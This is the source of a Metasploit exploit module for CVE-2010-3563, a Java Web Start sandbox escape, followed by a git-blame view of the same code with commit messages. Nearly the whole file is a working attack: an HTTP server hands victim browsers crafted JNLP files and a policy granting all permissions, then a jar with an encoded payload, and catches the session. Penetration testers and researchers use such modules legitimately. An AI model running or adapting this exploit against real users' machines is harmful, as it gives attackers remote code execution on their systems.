metasploit-framework/modules/exploits/windows/browser/java_basicservice_impl.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  # Internet explorer freaks out and shows the scary yellow info bar if this
  # is in an iframe.  The exploit itself also creates a couple of scary popup
  # windows about "downloading application" that I haven't been able to
  # figure out how to prevent.  For both of these reasons, don't include it
  # in Browser Autopwn.
  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  def initialize( info = {} )

    super( update_info( info,
      'Name'          => 'Sun Java Web Start BasicServiceImpl Code Execution',
      'Description'   => %q{
      This module exploits a vulnerability in Java Runtime Environment
      that allows an attacker to escape the Java Sandbox. By injecting
      a parameter into a javaws call within the BasicServiceImpl class
      the default java sandbox policy file can be therefore overwritten.
      The vulnerability affects version 6 prior to update 22.

      NOTE: Exploiting this vulnerability causes several sinister-looking
      popup windows saying that Java is "Downloading application."
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Matthias Kaiser', # Discovery, PoC, metasploit module
        'egypt' # metasploit module
      ],
      'References'    =>
      [
        [ 'CVE', '2010-3563' ],
        [ 'OSVDB', '69043' ],
        [ 'URL', 'http://mk41ser.blogspot.com' ],
      ],
      'Platform'      => %w{ java win },
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Windows x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
            }
          ],
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java',
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 12 2010'
      ))
  end

  def on_request_uri( cli, request )
    jpath = get_uri(cli)

    case request.uri
    when /java.security.policy/
      print_status("Checking with HEAD")
      ack = "OK"
      send_response(cli, ack, { 'Content-Type' => 'application/x-java-jnlp-file' })

    when /all.policy/
      all = "grant {permission java.security.AllPermission;};\n"
      print_status("Sending all.policy")
      send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })

    when /init.jnlp/
      init = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/init.jnlp" version="1">
#{jnlp_info}
  <application-desc main-class="BasicServiceExploit">
    <argument>#{jpath}</argument>
  </application-desc>
</jnlp>
EOS
      print_status("Sending init.jnlp")
      send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })

    when /exploit.jnlp/
      expl = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
  <jnlp href="#{jpath}/exploit.jnlp" version="1">
#{jnlp_info}
  <application-desc main-class="Exploit"/>
  </jnlp>
EOS
      print_status("Sending exploit.jnlp")
      send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })

    when /\.jar$/i
      p = regenerate_payload(cli)
      paths = [
        [ "BasicServiceExploit.class" ],
        [ "Exploit.class" ],
      ]
      dir = [ Msf::Config.data_directory, "exploits", "cve-2010-3563" ]
      jar = p.encoded_jar
      jar.add_files(paths, dir)
      print_status("Sending Jar")
      send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
      handler(cli)

    else
      print_status("Sending redirect to init.jnlp")
      send_redirect(cli, get_resource() + '/init.jnlp', '')

    end
  end

  def jnlp_info
    buf = <<-EOS
    <information>
      <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
      <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
      <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
    </information>
    <resources>
      <java version="1.6+"/>
      <jar href="#{get_uri}/exploit.jar"/>
    </resources>
EOS
  end
end
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 02:40:50 +01:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit3 < Msf::Exploit::Remote`
Retab modules 2013-08-30 23:28:54 +02:00			`Rank = ExcellentRanking`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`include Msf::Exploit::Remote::HttpServer`
			`# Internet explorer freaks out and shows the scary yellow info bar if this`
			`# is in an iframe. The exploit itself also creates a couple of scary popup`
			`# windows about "downloading application" that I haven't been able to`
			`# figure out how to prevent. For both of these reasons, don't include it`
			`# in Browser Autopwn.`
			`#include Msf::Exploit::Remote::BrowserAutopwn`
			`#autopwn_info({ :javascript => false })`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`def initialize( info = {} )`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`super( update_info( info,`
			`'Name' => 'Sun Java Web Start BasicServiceImpl Code Execution',`
			`'Description' => %q{`
			`This module exploits a vulnerability in Java Runtime Environment`
			`that allows an attacker to escape the Java Sandbox. By injecting`
			`a parameter into a javaws call within the BasicServiceImpl class`
			`the default java sandbox policy file can be therefore overwritten.`
			`The vulnerability affects version 6 prior to update 22.`
don't use java_basicservice_impl in browser autopwn because it doesn't work in an iframe against IE and causes popups in other browsers git-svn-id: file:///home/svn/framework3/trunk@11101 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-22 21:44:16 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`NOTE: Exploiting this vulnerability causes several sinister-looking`
			`popup windows saying that Java is "Downloading application."`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
			`'Matthias Kaiser', # Discovery, PoC, metasploit module`
			`'egypt' # metasploit module`
			`],`
			`'References' =>`
			`[`
			`[ 'CVE', '2010-3563' ],`
			`[ 'OSVDB', '69043' ],`
			`[ 'URL', 'http://mk41ser.blogspot.com' ],`
			`],`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 19:33:31 +02:00			`'Platform' => %w{ java win },`
Retab modules 2013-08-30 23:28:54 +02:00			`'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },`
			`'Targets' =>`
			`[`
			`[ 'Windows x86',`
			`{`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win',`
			`}`
			`],`
			`[ 'Generic (Java Payload)',`
			`{`
			`'Arch' => ARCH_JAVA,`
			`'Platform' => 'java',`
			`}`
			`],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Oct 12 2010'`
			`))`
			`end`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`def on_request_uri( cli, request )`
			`jpath = get_uri(cli)`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`case request.uri`
			`when /java.security.policy/`
			`print_status("Checking with HEAD")`
			`ack = "OK"`
			`send_response(cli, ack, { 'Content-Type' => 'application/x-java-jnlp-file' })`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`when /all.policy/`
			`all = "grant {permission java.security.AllPermission;};\n"`
			`print_status("Sending all.policy")`
			`send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`when /init.jnlp/`
			`init = <<-EOS`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`<?xml version="1.0" encoding="UTF-8"?>`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00			`<jnlp href="#{jpath}/init.jnlp" version="1">`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`#{jnlp_info}`
Retab modules 2013-08-30 23:28:54 +02:00			`<application-desc main-class="BasicServiceExploit">`
			`<argument>#{jpath}</argument>`
			`</application-desc>`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00			`</jnlp>`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`EOS`
Retab modules 2013-08-30 23:28:54 +02:00			`print_status("Sending init.jnlp")`
			`send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`when /exploit.jnlp/`
			`expl = <<-EOS`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`<?xml version="1.0" encoding="UTF-8"?>`
Retab modules 2013-08-30 23:28:54 +02:00			`<jnlp href="#{jpath}/exploit.jnlp" version="1">`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`#{jnlp_info}`
Retab modules 2013-08-30 23:28:54 +02:00			`<application-desc main-class="Exploit"/>`
			`</jnlp>`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`EOS`
Retab modules 2013-08-30 23:28:54 +02:00			`print_status("Sending exploit.jnlp")`
			`send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`when /\.jar$/i`
			`p = regenerate_payload(cli)`
			`paths = [`
			`[ "BasicServiceExploit.class" ],`
			`[ "Exploit.class" ],`
			`]`
			`dir = [ Msf::Config.data_directory, "exploits", "cve-2010-3563" ]`
			`jar = p.encoded_jar`
			`jar.add_files(paths, dir)`
			`print_status("Sending Jar")`
			`send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })`
			`handler(cli)`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`else`
			`print_status("Sending redirect to init.jnlp")`
			`send_redirect(cli, get_resource() + '/init.jnlp', '')`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`end`
			`end`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00
Retab modules 2013-08-30 23:28:54 +02:00			`def jnlp_info`
			`buf = <<-EOS`
			`<information>`
			`<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>`
			`<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>`
			`<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>`
			`</information>`
			`<resources>`
			`<java version="1.6+"/>`
			`<jar href="#{get_uri}/exploit.jar"/>`
			`</resources>`
style compliance fixes git-svn-id: file:///home/svn/framework3/trunk@11516 4d416f70-5f16-0410-b530-b9f4589650da 2011-01-08 02:13:26 +01:00			`EOS`
Retab modules 2013-08-30 23:28:54 +02:00			`end`
add an exploit for cve-2010-3563, thanks Matthias Kaiser git-svn-id: file:///home/svn/framework3/trunk@11078 4d416f70-5f16-0410-b530-b9f4589650da 2010-11-20 00:02:35 +01:00			`end`